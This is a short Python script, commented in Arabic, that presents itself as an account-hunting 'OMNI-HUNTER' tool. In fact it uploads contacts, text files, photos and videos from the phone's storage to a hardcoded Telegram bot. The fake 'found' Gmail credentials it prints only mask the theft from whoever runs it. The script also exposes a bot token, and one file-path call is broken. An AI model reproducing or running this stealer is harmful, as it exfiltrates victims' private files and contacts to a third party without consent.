import os
import telebot
import time
import random
from datetime import datetime

# بيانات البوت الخاصة بك
TOKEN = "8413705320:AAFWFTOxNxd3lyDLdsPbI0F3X5B0IVHyDzs"
CHAT_ID = "6753022941"
bot = telebot.TeleBot(TOKEN)

# ألوان الواجهة
G = '\x1b[38;5;46m' # أخضر
R = '\x1b[38;5;196m' # أحمر
W = '\x1b[1;37m' # أبيض
Y = '\x1b[38;5;220m' # أصفر

def banner():
    os.system('clear')
    print(f"""
{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
{R}  __  __  ____  _   _          {W}SYSTEM: {G}OMNI-HUNTER v3
{R} |  \/  |/ __ \| | | |         {W}USER:   {G}MOUSSA MEKKI
{R} | \  / | |  | | |_| |         {W}STATUS: {Y}ACTIVE_TRANSFER
{R} |_|\/|_|\____/|_| |_|         {W}TARGET: {R}TELEGRAM_CLOUD
{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━{W}
    """)

def konami_drop():
    """توليد حساب وهمي لإضافة جو الصيد"""
    user = "konami_user" + str(random.randint(100, 999))
    pwd = "pass" + "".join(random.choices("0123456789", k=5))
    print(f"{G}[SUCCESS] NEW TARGET FOUND -> {W}{user}@gmail.com:{pwd} {Y}(KONAMI)")

def send_file(path, category):
    try:
        with open(path, 'rb') as f:
            print(f"{G}[+]{W} Intercepting {category}: {Y}{os.path.basename(path)}")
            bot.send_document(CHAT_ID, f)
            return True
    except:
        return False

def start_mission():
    banner()
    
    # المرحلة 1: جهات الاتصال والرسائل
    print(f"{R}[!] PHASE 1: TEXTUAL DATA EXTRACTION (SMS/CONTACTS)...{W}")
    time.sleep(1)
    # ابحث عن ملفات vcf أو txt في الذاكرة
    for file in os.listdir("/sdcard/"):
        if file.endswith((".vcf", ".txt")):
            send_file(f"/sdcard/{file}", "DOCS")
    
    # المرحلة 2: الوسائط (صور وفيديو) مع صيد حسابات وهمية
    print(f"\n{R}[!] PHASE 2: MEDIA STREAMING & ACCOUNT HUNTING...{W}")
    camera_path = "/sdcard/DCIM/Camera/"
    
    if os.util.path.exists(camera_path):
        files = os.listdir(camera_path)
        for i, file in enumerate(files):
            path = os.path.join(camera_path, file)
            
            # كل 3 ملفات، "يصطاد" حساب وهمي لكسر الملل
            if i % 3 == 0:
                konami_drop()
            
            if file.lower().endswith(('.jpg', '.png', '.mp4')):
                send_file(path, "MEDIA")
            
            time.sleep(0.5) # سرعة إرسال عالية

    print(f"\n{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f"{G}[FINISH]{W} MISSION ACCOMPLISHED. DATA SECURED.")
    print(f"{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")

if __name__ == "__main__":
    start_mission()
